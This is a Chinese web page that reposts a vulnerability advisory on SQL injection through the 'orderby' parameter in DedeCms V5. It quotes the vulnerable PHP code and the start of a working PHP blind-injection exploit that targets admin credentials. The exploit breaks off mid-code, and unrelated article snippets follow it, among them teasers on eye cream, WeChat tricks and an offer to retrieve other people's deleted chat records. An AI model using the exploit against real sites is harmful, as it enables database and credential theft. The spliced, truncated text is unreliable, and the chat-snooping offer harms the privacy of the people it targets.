漏洞说明:DedeCms由2004年到现在,已经经历了五个版本,从DedeCms V2 开始,DedeCms开发了自己的模板引擎,使用XML名字空间风格的模板,对美工 *** 的直观性提供了极大的便利,从V2.1开始,DedeCms人气急却上升,成为国内更流行的CMS软件,在DedeCms V3版本中,开始引入了模型的概念,从而摆脱里传统网站内容管理对模块太分散,管理不集中的缺点,但随着时间的发展,发现纯粹用模型化并不能满足用户的需求,从而DedeCms 2007(DedeCms V5)应声而出.80sec在其产品中发现了多个严重的SQL注射漏洞,可能被恶意用户查询数据库的敏感信息,如管理员密码,加密key等等,从而控制整个网站。漏洞厂商:http://www.dedecms.com漏洞来源:http://www.80sec.com/release/dedecms-sql-injection.txt漏洞解析:在joblist.php和guestbook_admin.php等文件中对orderby参数未做过滤即带入数据库查询,造成多个注射漏洞。漏洞部分代码如下 Quote: -------------------------------------------------------if(empty($orderby)) $orderby = 'pubdate';//重载列表if($dopost=='getlist'){PrintAjaxHead();GetList($dsql,$pageno,$pagesize,$orderby);//调用GetList函数$dsql->Close();exit();……function GetList($dsql,$pageno,$pagesize,$orderby='pubdate'){global $cfg_phpurl,$cfg_ml;$jobs = array();$start = ($pageno-1) * $pagesize;$dsql->SetQuery("Select * From dede_jobs where memberID='".$cfg_ml->M_ID."' order by $orderby desc limit $start,$pagesize ");$dsql->Execute();//orderby 带入数据库查询……----------------------------------------------------------漏洞利用:80sec提供攻击测试代码如下(如果发现代码无法测试,请访问80sec官方的txt文档): Quote: <?print_r('--------------------------------------------------------------------------------DedeCms >=5 "orderby" blind SQL injection/admin credentials disclosure exploitBY Flyh4twww.wolvez.orgThx for all the members of W.S.T and my friend Oldjun--------------------------------------------------------------------------------');if ($argc<3) {print_r('--------------------------------------------------------------------------------Usage: php '.$argv[0].’ host pathhost: target server (ip/hostname)path: path to DEDEcmsExample:php ‘.$argv[0].’ localhost /——————————————————————————–‘);die;}function sendpacketii($packet){global $host, $html;$ock=fsockopen(gethostbyname($host),’80′);if (!$ock) {echo ‘No response from ‘.$host; die;}fputs($ock,$packet);$html=”;while (!feof($ock)) {$html.=
本文导读目录: 1、黑客是好的还是坏的? 2、有一个叫做白客的吗..?黑客是好的还是坏的呢..? 3、什么叫黑客!这属于一个好黑客还是属于一个坏黑客! 4、什么是黑客黑客是好的还是坏的...
哪个牌子眼霜好用(全球最好用的10款眼霜推荐)眼周是最脆弱也是最显老的部位,谁都不想一眼就让人看出年龄来,大多数女人会选择眼霜来保养眼部肌肤预防衰老,而一款好的眼霜是非常重要...
网站建设的目的最主要的是营销,所以,各种行业、各种类型的营销型网站层出不穷,营销型网站提供人性化的服务,将自己的产品与用户的需求结合起来,打造成受用户喜爱的营销网站。今天,我们就来一起看看营销型网站的...
大家好,我是旺旺,我们微信上呢都有一些长时间不联系的好友,我们想知道他有没有把我们删除掉,这时候该怎么办呢?今天给大家介绍两种方法,在不打扰对方的情况下,就能知道他有没有把我们删除掉,跟我一起来看看。...
怎么查别人已删除的微信聊天记录」想查对方记录怎么查-免费接单 从几年前把主力机型换成 iPhone 以来,带两部手机出门就成了我的一项日常习惯。 最开始仅仅是出于新旧手机交替的简单原因,但用了...
5G时代的到来是必然,但对于大多数消费者来说,还不到非用5G不可的地步。近日有消费者发现部分地区运营商下架4G套餐,很明显这是运营商想通过减少4G套餐的供应,来加快4G用户向5G用户的迁移速度。对此网...